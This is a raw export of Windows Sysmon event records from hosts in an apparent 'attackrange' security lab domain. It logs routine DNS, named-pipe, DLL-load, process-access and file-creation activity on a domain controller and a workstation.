AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-60153- 354300x800000000000000078688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.649{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57684- 354300x800000000000000078687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.649{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local60153- 354300x800000000000000078686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.648{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local56128- 18141800x800000000000000078685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:10.998{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuthLib.dll2021-04-20 14:58:10.998 11241100x800000000000000078683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:10.998{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-crt-stdio-l1-1-0.dll2021-04-20 14:58:10.982 23542300x800000000000000050497Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:11.806{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DE73A3170DAA392430CECEEF2FF2F32D,SHA256=B7E06EF8146ADA6B24C44163BBA449F8F903BAAB4005C3A2A7C28A62309D45F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050496Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:11.462{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2828A8E07FC10BB72545DD92DE866246,SHA256=A94B0C81626DE5382FB69FFA71BC476D18B73F724928A88B5D4381DE34D37852,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050495Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:08.813{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50056-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 18141800x800000000000000078899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.904{A7A01FEF-C0A6-607E-8105-00000000BB01}836ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_1_0.pngMD5=099BA37F81C044F6B2609537FDB7D872,SHA256=8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000078887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.904{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3f049|C:\Windows\System32\modernexecserver.dll+3fd2f|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.904{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f6a2|C:\Windows\System32\modernexecserver.dll+3fd1e|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.904{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fd0b|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.904{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3fdee|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000078874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:12.857{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\msipc.dll2021-04-20 14:58:12.857 10341000x800000000000000078873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.795{A7A01FEF-C0A6-607E-7805-00000000BB01}424612C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f400|C:\Windows\System32\modernexecserver.dll+47a8c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 11241100x800000000000000078872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:12.795{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Qt5Svg.dll2021-04-20 14:58:12.795 23542300x800000000000000078871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.795{A7A01FEF-C0A6-607E-8105-00000000BB01}836ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\ADMINI~1\AppData\Local\Temp\{CBE6E9DE-1D71-4288-8A25-0AAC39829860}.pngMD5=00E5FCFD833151F7CBDE607E2F7AFEB4,SHA256=B80192AAABE007BAECD0603E3CE183E9D554B8A6B0411D20716ACFA086AE3035,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000078870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.795{A7A01FEF-C0A6-607E-7805-00000000BB01}424612C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+478ab|C:\Windows\System32\modernexecserver.dll+476e0|C:\Windows\System32\modernexecserver.dll+4763b|C:\Windows\System32\modernexecserver.dll+3985d|C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll+1781|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c 18141800x800000000000000078862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.795{A7A01FEF-C0A6-607E-8105-00000000BB01}836ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\ActionCenterCache\microsoft-explorer-notification--d1f6275c-b9a0-a25e-7f73-51b54487be4c-_5_0.pngMD5=00E5FCFD833151F7CBDE607E2F7AFEB4,SHA256=B80192AAABE007BAECD0603E3CE183E9D554B8A6B0411D20716ACFA086AE3035,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000078860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.763{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.763{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.763{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.763{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.763{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.763{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.763{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.701{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.701{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.701{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fc6e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.701{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3fbe5|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.701{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 